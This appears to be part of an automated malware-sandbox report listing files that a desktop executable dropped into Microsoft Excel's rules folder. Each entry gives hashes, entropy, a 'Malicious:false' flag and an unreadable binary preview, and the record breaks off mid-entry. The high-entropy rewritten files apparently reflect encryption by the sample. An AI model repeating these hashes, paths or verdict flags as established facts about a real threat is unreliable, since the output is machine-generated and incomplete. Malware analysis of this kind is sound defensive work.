                                                                                                                                                  SHA-512:EF31B9FEA92F143C1FC8AFEEBE3F8765E3773D3FB8FCD0564842FAE03EC739E58AB13F9BBBA22B8108A3DFE0F2EA7C5C9215408F61F41670B6493F7D8ADCA611
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.....b..).|o..p......B>..8..8..0+......+..6...F.s.......K...oh..l.=.....N^.3.B.~!Cg*_B(hiR..H....E.........]..i..w.{.?..~f<.!...3..u..hj...6z.......M.,(..3.@.".S....+..=.*...\..4.z.Z.P.S..Q.gO....1.l....'2..?.....n0..~!..?.-g7....h.A}....f.1.....0....Rn|<...$<.sC..u#$r.[....hwx.$y7[%[;.t .....Y7.3.....`.Z..V..I.B+..v<...se.<"H(.:.........GVMrY......#...F{.E.].N.&.......!t....L..>..Q.d.#0.y..........$}...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120680v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2285
                                                                                                                                                  Entropy (8bit):7.923238177079843
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:ihlcEonWS4nHacsvz6hbqEBTRbylDlnxENTKSPryhnbjcztfpY1mxLmXtGY4SaD:ihKEoWbDsvz6hOEBTRYDlxEN2iOxbIJr
                                                                                                                                                  MD5:A586D02A518DCA2D6160DB630F63F62C
                                                                                                                                                  SHA1:29E96CF64286CB973499A81B2B24030711CA5414
                                                                                                                                                  SHA-256:86B1FBFB1A7AE241E6CF3FB8135D70247ADFAB32BCA5CE7B704407A89CE69394
                                                                                                                                                  SHA-512:A428F4DD81306807157B51B683976E0A4C0D2813B1E651A96AA6CCB8DE900EBBE98B6A22997ABBDBD502D2D39901B85DF7252DDA0558DDB0168A11881E4DF699
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.qR)O...........q.Pc..$U..|;@......@...'.....n..fO..e...,d.....(;.1 .h..6].....mZS:..PB.8].3..s.0.'......LF3..\...^D...m..[..Z.1QF...T).."exX.H..J..K...Q..@.$}'..|..-.=..v.M...~.r..o..o..*..#.^....m...m..{....iG......3..x..._.................#S..x.0.MvS#jmu...:...X......?}.{.4...&...~(...y..a.e.#.h..T.J..G.r..:TQ...YT .\.R.K.X....L.t....g.a.k...&....6;.....%3....f...9.4`...\E.H......t<..Rn]|,.(D0.@...K{.v.....@U..F...Wp...Q........~..n.Z.A5;...B\.@...0.8.?...Y..v........?`S..._.....Y.=?}...n]..iNb|.A..*...........+....6.F~.X..D$C....:}.K..e;..E2R..Jp.A..NWW..!.<...W.../.c..9...4.J.......=Wr....h._5X..........5I.y#.z#.#c.^.K...]W.....A..C\^.K...c....Y....O..[6.'..;.'.OX......PvE.7ExZ.W.......9.?|Al../...w.6./.H..y.g.....*.|2A{...9..IX.Wq.<}?i(ym&..%.......q..LY.......@......>m#)..\_....4...8Q(..V%.N.R...r3O.k.8.....IN.Hw....NH..._.........@...>y.L.I...... {[Yv.J...J...K....#4........0.h.i.....Cq.<.....A.tt.$..Y......9.#.'....1B.r

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120681v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1291
                                                                                                                                                  Entropy (8bit):7.845436152494519
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:CoGb0JDqlE0Od4o/unoO6QqJ63e3Ee7w+5dXcdPG47vGGoMyyJSvOV2bD:mwDqlho/QNBXu3Ee7rrXWf7OGRyyQ2uD
                                                                                                                                                  MD5:010CF7FD7C30E93F762C5E29D4D187B7
                                                                                                                                                  SHA1:12FC2853CB230776277C0DF7010E8B25F09EA57B
                                                                                                                                                  SHA-256:B1092160055B7CE53DBCEE9BDA3A6A83428CEDEBE84AC2A908BB1BD2338B8A00
                                                                                                                                                  SHA-512:6A1307F0676147FF31496ECB124F0EF0C0A0EC169139F13B3A25E577EE6F90E04A0B8857D4F25030563BB653829E57287194BF14948728B78007B13BF3CF24FE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.Mk..I....2y.....'..L...6..o.7...ZS......<....b...Ol........\H..`V......$....X...!.z..EL.^fA8h..ijc[.D..G.....m.[.IE.".5.tT..(...>=.w.|-.f....4f...>.v.r.Vr..U...........V......p..K....ty.4pJe....1k..1......"aJ[.VG~R`.'.T......U......M)...}..H.&P.eh.w.....2..?.K..=p.1ezE........hg....dF.,.t.xU.A..=)p5."........V.kz....hi3b...W.P.rDi.|.t.G...^..v...)p/.kh.ja.Pk......@7._O.?.A..KZx...g..D..F...`..>...C..$P......H.r5...f/..U6#..2.I....k\c.J`.t>.'....7......[..Q.q..l:..+i1...g/.L..lr9..g..g..M.G..)..apR..g:O."eUIO..;d.U~.H.#..4W.uo..;..d8.4)t..Q)0...,...D..0....8..[l.~.Z0.M#.p`Xb..._$i....^>.j.m$5.o...E..F.l..^.o..\...).v~..]<.&.TZ6.w..O......=.2.'...5W.q.a.*Y..E..... <.....jQ. .......n........hd.P..*N...c%.f...AX.2+n...r.:Q.......N.%....b...F.mc.....L..'.'..o.t...r.3...rI\.x.gx....c.H.JGn.k...j...7W%."...y4>m..[..f...x.EH..?W.V..U.y b..!..T.iF..-.'.....R..g>N..o.>n....dWvU.N..e......A..S..Q}.H._.G...gY.|.P...5wZ...nZi.3....lB.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120682v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):834
                                                                                                                                                  Entropy (8bit):7.708457475269283
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:DqXZcyxgvT02svyB7KrTm9YaPEJKTlpzC2bD:IyZssgOMJKTLzZD
                                                                                                                                                  MD5:8F993B7F7EC7B46124BA148B89B48A46
                                                                                                                                                  SHA1:206FD2630604A921A209BAB5BEE564C7AEE94458
                                                                                                                                                  SHA-256:01726C0C0191B56003D70EC66B39346AEEBE22A18B73B35D94FC325CF8FB8136
                                                                                                                                                  SHA-512:45DFB49AB1EA3C23C65C9394E9C86EDAE8897CFCC90032A78778FE0B7B27A1931BF5A638DCDFCB607A57A261769D0660132CA4433DE4EB18D26BD02086086EDF
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml3.{.{. .S9k........E....m.....M._.....K....].i...oU.1.,lc{3Iq..ru.ff.U......A9.Ly.m.0...0.p:...:.v...O...k........R...y)._..M<.x!G....w..Q+.WD..`.$6....R8bq_..N0..O@..uI....... ...+........?....3.Z8..2.2....p.Wo.%,~.[%.N..8.I.."......t.2.p.,.Z.o..Ah.....k..9..r.Zz..`Lc....0...$.....0...m..eX..&0.o}.;y.$..n...=.1..[9U...,.[_.?R[...wkV.b{....,.O...-w....*..F.......k8.6.a.[K1gA....j......!F;.u<..@._.Z.mm.O..v.yw..c......B.;....s.{......2.Q-.-B,.}.^.'.o4..4m..Bk........f3.%:.rd[......*m.I...J.].U!..."...1..G..X....`...W{f&.5.......0N.c...!..As$.a.'....$..G.H.W.c....%D.C.D0...r.5....o...u....QY.]......d..o_j..?a..\./%.._.../1%.%.~....a...[.&..I..9.*..|......{.F.aY..z.5|Bza...A....=A{.g.A...QN.....y.@.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule130009v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):630
                                                                                                                                                  Entropy (8bit):7.628708786079931
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:cfqSCN3fyQY0IMx7kgGxpu0q/UEIPmYLmPhIhagfggu3mLWv/OWSUdNcii9a:JSCdp4gGxpu0qIPChqDVuvWV2bD
                                                                                                                                                  MD5:A404A7D61B424E0ED3E4A8C166990A63
                                                                                                                                                  SHA1:834BD10330936C2D2265D53E2A81DD9E0C0E3710
                                                                                                                                                  SHA-256:DC734A01CD6BC30317FB67B2E42A3844B49505AD030E1E91E6366ACD55A8E4F8
                                                                                                                                                  SHA-512:8960BCE283E1C3681177753459160859AC9C0AC74A3F1E4EA3689694FB931F28A55DCDF281FBD323D5DA7B6EE5BFB73FA130004FA9F0A8D0CD52C63CE0792DFC
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmla.."\.o..(.5....Ail.)._..&_T...u..f.M...DU.U.w.j.3...E..hdEyzS.....H"t..v.z..P..e.$W.,*p..i.F....&...T..[L...G.>.._......p\.@f.g.PP...'`.g...w*b.....0o....g./.&{.J1.a.....E...v7B..RE..T.".X.7!....P..{V.......#J.8....P..K..m.<....Y..d1>........ZH...c..p...7...>0 ...g...L.r2... ....W.....-.^.......Y./..+..&.0.SZ.... {.8.K...I.i.w...R.|K.........&.G.......m.~az.....7.B..M...q..tF%3......>jg.TwmA2.\.....I..j.;..+...I......%\*T.m|.....[0o....(N.c.7(9....YB...q/.....y.......tI31..{............\.v".I.9..]Qea.. ....J......mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170000v6.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):851
                                                                                                                                                  Entropy (8bit):7.731787410366335
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:DgwZZZZyTTjDd9i2f5ghDAdz48ce1e1s34wwlKgWSMTfOrTmzsWdtOGh2A8FSUdV:VvvyPdBEA94Ne134wyKXCu9tKAh2bD
                                                                                                                                                  MD5:860AA8659E9048B79F4AC7F1097B8099
                                                                                                                                                  SHA1:5A2CDD19735252CF181379C9BAE12485997E4154
                                                                                                                                                  SHA-256:9BA450A3E1874E37637306C8EE8635C8149DE4CEDE82605545748953B1E7342C
                                                                                                                                                  SHA-512:8A61355F90ED25510A36A65C61BADAD88AEC9BF214F1E4388F9EB65CD4FD050BA02324E05233E8B381F221E77881C8F5DEC7CF9515734759E86499810F5A9610
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...t...Hy..t.B...`..C...Y.A.[u}e.a.N.RhM.K{.z.........S...$Z..0.&..r.......4.J.Z....'%....zGNP-..B.;-....=.`..gH..};{.....tH*......z.eubs...oM1...*..]u%./..A...).xh.25,./F4~m.V._...-{.....f.k.Y.w`Mw....3<...,.m9.....k%.K)5..+K.Y6 .M..P."....?...$..."[.MNB<..o..."p.k..7.vg.2,j...Zm2.V.$.N...wk....s{&E.R.O....b....i..z..=H..|t..S$....}.L..U'...}.r3.9{."@.'.......:E....a...+.ie..........A?W...!.HG..w.......I..B..5.....{NYMF=..V.e...@QJ9.,^'.....Hu,f...~"Y.>./....*Sh.Osl~...Tl._6.{.e.Q.......x../Z......,.U..Zd.....{34..t..>.0?{F.!.NF.F..0.T......N.,(j*g..Tp..t^..1D...a..cl&.uQ.a.ap.../LR..U....dv..5.hZM..81<..8.<..U/v0. ..yOQN...R..F..@....]x..A"x..a. ....U..'..2..a7Z.U+ghw..+(dp.q'&&F..S.....[hA.w..F.=.Ig..3BP..emMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170002v6.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):6314
                                                                                                                                                  Entropy (8bit):7.971158092889536
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:W4QXvLeh2wPHsHC809jXqDuF+mZy/WR2kp2ZAL:W4QXv6h2wPH+C8Umuh5KAL
                                                                                                                                                  MD5:CF2C7EE1C19A0A443A558F69A380E0BF
                                                                                                                                                  SHA1:127C2C035D7745F308AA120D06397441E964D635
                                                                                                                                                  SHA-256:0D168336CBBED14FAD521FC9614CAF09AA061FDEDBA2D09AE1E791E66F9899C1
                                                                                                                                                  SHA-512:BB20AF9EE917DF52A3372AD0E7FC1CFB15940AEA9461B0B36BA13AC10A331DE6E8FC4A6B355D10DAE318E0D07E80E644E85F96C22932DE991507644CAA33E6A9
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml*."G.WN.V_.....1.......R..Y........5. &=.....tn.&..7..o.P$......D3....=.Q..#1P.)...B..m...._5......._!\z.Y5.\...N...........Q.0.?s.|MK.{.....Y?...8.AH.J..5..H.['./>rxn._i...t.G.....!^..CuR...w....A......^[D.5uz}!..)..{..^g..xx.W72/.@..d..A.!..^W.W.5...r7..T....im.XDCW.n....b......I0.12../$i..t.q{....JQ...Nc..d.4..>...6.R......*....T.2"..E.....1K.%.".:....W..1.....I..e..7+..X.@.qD..nx.(.].a[x&...x..6....;...*.3....E.......=pa....j..i........q..6....I..$f.X.zp..#.kI.]]~#..^+9..SEd...V.pP.2......b8...t....?.`..w.....U.......R..T....YnGx.....h.....s.V...:.*qD.196`..D..y.Wl.......~.N.1.e.....`.B..=.Lw..E.`.B..'.rv`@.._k9$@...a.O@+..n.M....l...$.x0..z#q..W.sp@.*....]b<..8+!cA.V*...5.>;`...'..OX.N...V.J.v..x..R.W..w....7.Ln.&..Q.M.O....4.d.a..y..dQ.@.Y.....<..2Q.....xl...Y...=u.}_.....`..[.............Y4......c)..C.{.(..4....q.~Vg...7..1..ia.G.e7r...RwX.,+#.k.....M..v.V...c]....>l..bUb.g3.....).Q4L2.2...../7].~*..9 j.q\...g.*.o.a. C...P./

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170003v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1029
                                                                                                                                                  Entropy (8bit):7.7828545478160525
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:YiK3II6G4PBI18ew9pKB15m14EF5LcXyqqCAopo2bD:Y596G4JIK2jm14EFFqfbD
                                                                                                                                                  MD5:FC4569465D7E2CC9EFB2FF268A896049
                                                                                                                                                  SHA1:F98BE1FF4533C67A8783E53C669E72BA058CCB18
                                                                                                                                                  SHA-256:940D7C11758E9BBB9FE936E4443C902EACD9ABF6792D4B717F30352BF8C7B8D4
                                                                                                                                                  SHA-512:F49F7A09078625F9722C19E286E1E104EDB57B99C09451E8193C64FBEC25563F7A739EA5B3742BF6C9F988D39C524BA022DA17337639E5F5A003F37F6E98F4C0
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlV<...j....d...~.xOFW.wW(.a....%.......{....f._.H.E.4........X.1Gy..E.....#..d.W....U.R..A...c.....o.MP.a..Z^v..`...}.....1.I.-r.BU..Mt.0>....n...vl.7...q..._...KjkO.]*.|.).....Q.&......0....N.'{....s...y.L.%.w...j....> ..L..~<...8.b.o).h...*U.$...i..B.K....[.}.L.8K...w...}h.3:&...Ryd.o.f....x.on...U0...H0.Q.rj...%.xvL..g...F.q..g.0.Iv..F.h`.f..+..T..}..N.K(.......i}I./.......q........u.[....f40..[.T^e...;iB..1r8..p........H&l........B$.N^C.:wI=.cn.H.\...u... ....{4.......BG.. .S.[..$=. ^.wKD.\........k..._P.. 3.._w...T.....7....'.bX.m..).q..Sg..[..4] ]jLK.2....:'.n.8e...I_...d.*....i:9z..0.n..v#c.).........'....]}S.K.*..lE.:)...*z........8M.{4Q.../&1..!.e.*..?...l.}p[Lr..n6EX;......Nc...;.^.......D.zX0....I.[..v?q..&4.9.J..$...r;........C..-V.."K=..2....c$..gq0...8o.4.hF.*..=..rV.-.4....J..>YV..]r..Z....{:.....^8.2...7O.Y.W>.e..M.....~hh...RA.Tw/.]'...y$..F7RT_...?...s..Q...)...?1..#...GmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170005v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1040
                                                                                                                                                  Entropy (8bit):7.81549117201453
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:FIDLcy8Lk/lPS8pfii/V0FDvjTlaXjdjwQV5rpkHTV2bD:gLRmSlP5ZN09adsQnpkH6D
                                                                                                                                                  MD5:6F757AE7F94DE71934C0B02A65ACEDB8
                                                                                                                                                  SHA1:3061C664899ACCD61677893FCA05B10911C2E6FB
                                                                                                                                                  SHA-256:E934C6242F0CEF6B4CB2E09BEA4745BDBF87557B7BB6041715DB94DCBC44CE4A
                                                                                                                                                  SHA-512:3E1555180E423143EF068318E5E2D1A6249DA6B5E2B17F32B964437657FB378C3D1640514186C9812D30A34AC9A36BF1DAE8D8BD23F20A21B0FCF3122AF42FE4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..."....$N.}.._.bAu..nc\Afz...!.PW......s....p~,....A}S....5...wZw...}{f......@.....g........x.2....].2Y.x. p.).s..9.. .b.....<y..\.VtI.~...2............1...'.ln..K...v.....,.M5...U.b..rW..'.J.(z>..P........>... sq....v.v..Z...d..H...W...K'B.g[.HgZ../#.......C.....}..n.UcX.@..'..4...B.wr=...(@8...+];.M{..{...a.z.qt.(s...kh...k..........i>..pV.i..{.{z7%}.s.I...lP2.......>b....Z...]..._j.X..Iv...wW..u......r.?...|.....`A.r...{.Cx...^. 9...(....<R...S..{..n8....g.....>b..(.....b........9...M.3Be.E......3s%..L.b.....z.]v..wt.....S+.Y.2..X ..t.kg.....Z*...i....h_y.p. ~MO......wZ.!...v.o6?....0......%..!F.:s.P'..)>......C.f....O..v7...*$..\..h^z..d.PO:.YR.N.c}|.....G...*|_.y..^..j..I.*..."..q..)..........vp)...4....39..O...t.3.U.+...h&]qS....%.....N.tn.[$?.........!.i.J.p..iv].F....KA....jg......h..).~....o.5........^JX....._.Ls.'*E.`.u...T)....N...H.Eq..Y....d..T.K..[=s.....fE.'~. .s.O.t..E.8..`.3.L..LF..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjw

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170007v5.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1415
                                                                                                                                                  Entropy (8bit):7.838787439889867
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:wQ+f5ZBQ/b6fGGKZIJYeioncudY8vfX1W28ZZRlVcWbGq0NyDILBH/NvuBr2bD:Ef5ZBQ/efLKZaYeioncudYQWHZes0YMt
                                                                                                                                                  MD5:685273199E0188623E980D0A420E58BE
                                                                                                                                                  SHA1:FE8C00AF7321A34E787F35D97C5A6869AE2E3A35
                                                                                                                                                  SHA-256:4C6E59E8A060166178F072F545610ABDAE4B476E08B3938130049F08D4E76FB8
                                                                                                                                                  SHA-512:ADBCD70AE7BCCEF3DC0638ECE77E76FDD57B13064DE54C6E20B7C3F10426EA985F2E7FEE8CDDB3D83BB1DF71AE7A2011A2F10CF32304B17AB98223C881016B08
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..U..../..-gn...5..3z.}~a.:.{?...I.<Y%..(.....^.H0D.!O. .y7 ..'u{....IpcWb..._....l7...S-.7..1..6s.Z...g..*.);.r!...JD...%.G#`..+{..0...+..N.u.h.........a........g..*....M..Y..""'.A:.V.PS.x..<."...nJ.Lr...j...6.(_...a'...!.k..I..e..M.x.,8.W..@..@.p.....W.F..q...q..I.........S..|o*?.$`.t..J....9..\.HL............_.l1.!..}lcK....MD...?........8.J..L..N#...s..L..6$A0...._e\.....n..........).>.K.#a..D........a.._.~.m......fEF..u.F.W.........7%.eC0..C.....W......-.?..*..._..W.....k5:*..T..T....JC.k....E~X|.m....J...{a.......h..I..%....[.3..^..~V..-.....R...3.......64.9h....V...:........K".`..g'.il...~.....s2<.$.C.......h*...,.c.r..P%[.8-.3..4..9.:Q_=...t..@jo0.e...{...aZ. 66OW..\4..m.7..B.3S.....\.k...|.l4.......z..}8.;.J..x.[d.f.\.......0.E-.R"a.nm.nU.2.$}....E.;.i.\..t;...1J0.o.).....Ab...t..?.m&~..u.Lk.....E...'.Q..em....'.)bE.G...j..[.8S~?..}..U.v...f..e.j|./|x+M,.Cp.^Z.j..e...z...%a.F...[K.T*lM..(..JC...R.f.#6 n.B&..0..,.....I

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170009v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1073
                                                                                                                                                  Entropy (8bit):7.7620383008834
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:VN7YIJZErvhpVd9ts2IImbLWyBPaJspitLgYBh7L2bD:VNvEr/VvS21mbliH53qD
                                                                                                                                                  MD5:CDBC4591789154D34CA4C445BF95A31A
                                                                                                                                                  SHA1:E28605064761175CC69F4242A2A5A14EFC751AA5
                                                                                                                                                  SHA-256:4E5DC0A5F9AB8AA28993D145E70C8C88FDB99A1CB0BEEE5633928DA383084FB3
                                                                                                                                                  SHA-512:1FF4514E4AEFA20139AC41E647C3AFD32DBEA3D443A5158876A0ECA1DAABB79216D44CB290571D0918B9B39F820B0D766D10364A526863371EBA600499253599
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml!..1..q.(..{x1w._U^.A..4..E=.Z...H..@H...(..<<..V...AcO....uw.......? .y.)D.5.._......A.O.3.*.........^...C.+O.G.D.T^..8...fRh.}l........."f..o....{.......;,..p~Gw.=..A..(...2..Y2..Vd.....`.X.T....2...s..'.x.'.eA..Sfm...F.a_.V.........N...R,.-W.-.P..u.[.&3..i.&....\.@eE.K..... .?7J.tV..1NgA....-..m-tk...9...)am...Dh.9..F..y..,.:.\I4J.0.K......rX.|8.e...z..1"Cj...k..;..2....~.o|..I5....o.Sj.;..W..@Y[..K..._...zOS...F.Nq9.f..^el....a.K..S.F.0.%......i^I..^..+qZ.*..oa.wY..'.Oj7.=....J..2.U.I.I..k.b..aQx=..TQ.S8@o(..c.4...w$.jo..Im.I..}.Rh.../..iE.Q......._m....4..X.ob..R.a..o;...=..U.. ..(.Y.AH.?..u.f..kF9..r.Nt.@...V.KX|..AX.2...a.Yc....T..s.,..[U.......d\..p).:...3.a.)11..p....r.s.Da.U^....?....I.0^.h..Z...A..].@Nuyo....o...&s...;...,{7.^...h....`.......q..a.>.O..DoJlUU..]F.&9m*....C,..?...._.....^..Q......G.WA..k....T....|.<.;..&....K.q.$.....G...@.O..d.v..C.....b.6...U..P...k.95..#..._&N..6.....nc.:e*5.:.w.fg.U.gc.A.>.H...i;..<.9..i.mMsRx

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170011v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1154
                                                                                                                                                  Entropy (8bit):7.83502508391585
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:gdq1WVcK511KlUmO5wpfTfxnZ2Xhchb0Z6t9tTrQMz4lnVqGg6m82bD:gdssca1K2u9H3t9lMMz4ln2PD
                                                                                                                                                  MD5:2533BFB4D69ABE5DF3F49A7DEFF292AA
                                                                                                                                                  SHA1:3C1095801C08A90A68DDF0627368DD7FEB04F45B
                                                                                                                                                  SHA-256:1F7FF327F7CC3E374DDCBBC833FB8E41F7B5E46FC5597E8E172A2AE34E4690A0
                                                                                                                                                  SHA-512:3C4282FBB59D431F713988C629411976ED1F5780F04300D508C2C059EA2CCFE6BE59A75B1A9BAB9D78C30F01399FE612D214BC0AC667B397D28DD2F240F01600
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.b(q..P..{*K..}..!..k....yq. ..l...`.,.O..GOb...t.....Y..g..UgXc..,..{.....u.5..,.E..Z.._.....>+."^.^....K..RsL.....^.....:o<w.........P..._J1.unb}f....u....aT..u.....H.=..o.UP.L..,........Z.....E...bw.8h..,..:G]..R..S.....a]3.4...'.i.+V.lR...M.=..x...;....fnYE..l.@.$..Yv..m...z.L.Xk1/.C.i..).b.|+ycW..|9.#{B(d'.nAr....C....z.......5B.&k.B...@...ZN.-....f1B..(..x..J.]..F.....,n.&E...:z..m%.H..S}K.'.....&.J.....>t......j&..}cn...t/.!o.....`,.R..l...+..{.$b.{..t.....z.....K.k.tq..l..w..{..D.x.z...Y.[.2...y..3...}A`..`c.E[.........U.....=..^...-.1........<...(.rB.S...../.....E..K....1.N9..FJE..*..S2.z6.z.<...h..W..........B..5...$..JJ..g..M..6.Z..*^.(....7.....-......B..1.6\.y..o...T.c........"..vzt..9b....y........z.A.3..P.b\.(}.5..h...A....2B...1...H.....V4...iM.w.;..Y....A{N...$...c...'..o.=o>p.KQ.X..D!F..NX....2.g:!.~.8.T...=.Ke...8...e.U.=O.uh.[..1..;....>{t*A.O..O.>.x.{..#...G..@.QD.&......L..CY...[......b4.s7`B.......#..D..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170012v8.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1902
                                                                                                                                                  Entropy (8bit):7.891184355910917
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:4aN+if2skzkxzEtRzM0Ti8XSISBjhZQEoC60RJnA1QmmiANqEruRQEXAhLM+AflO:xN0+zEtRITISYoJA17jrCmZlluD
                                                                                                                                                  MD5:3F2CF7CDD8F26DBAFA1C3155A34DE099
                                                                                                                                                  SHA1:C4EBC762021A8019A66F6BCE5C701259D540923F
                                                                                                                                                  SHA-256:E2263FE658AB5B3982E1E63F65AC5C139FF140C0DB6EF7F57B1CC6BE35755215
                                                                                                                                                  SHA-512:5F9DA1460060CBAF49BC43B88115D8C24405A4B16AAB7D180796247D542764D1A4899EF646790BE568AC2B87880F4177CFCC9E156B2B53A0F902465770A85592
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml....5gm..rb....}B...F..K...-@.r..G.E"F.{......8...~^..:..6....|{..q.\....G. ...8:$...<...,.o..xnF....6..m....}.Lb.<P..........;............. .U...k.Ba-ng..l....q....->.w...........B..c...I8S.L..S.>..w`.a..v../..L..Q......I...@.N.......zo......\..C.J.Ut.o(.a...G..m...t.o4)~...F#.......9.;..v......k.5`.YX.`y.)x.......O.)....w.p..EY............#/.\&.xT.Q.>l.%.....r ....e.).J.Y.S......... ..6e.Y....P..E5..........*._}3.a..B....KY..{.t....o4Q....g....m......p...eY3......#..u....`4x......O.yB......&hpn..v.2.x&,../...dk.m`u..y.~...?.(.F..x...u..!C....P.8ft{..`...e..c;.... .4.)...{i.H.9.Qz..ng..<M.W.`J.P.q$..Z.....+c......#yP.F...nB.Pj..f...V..~.1:g.>...dF.t..z4...<....o.u..n)G.-z|.7,.u.kq..y..{Z.s..|QO\.........s.U..W..{..&f.......p.#V.....'....^..Z({Ui.[..."To.....Yv...G{..l.(..?.d.....8...u..xP..7MJ/....P.zt..*S.Z...M.ht.qQk.....B.:...c.p.].m..JAC....H........iS.&.(...E...Y....#E)r!I.E'.+A.....&..$..<.t..^|>...l.j.(.....aK.r..a...6.!.hw00a..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170013v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):712
                                                                                                                                                  Entropy (8bit):7.716943800877414
                                                                                                                                                  Encrypted:false
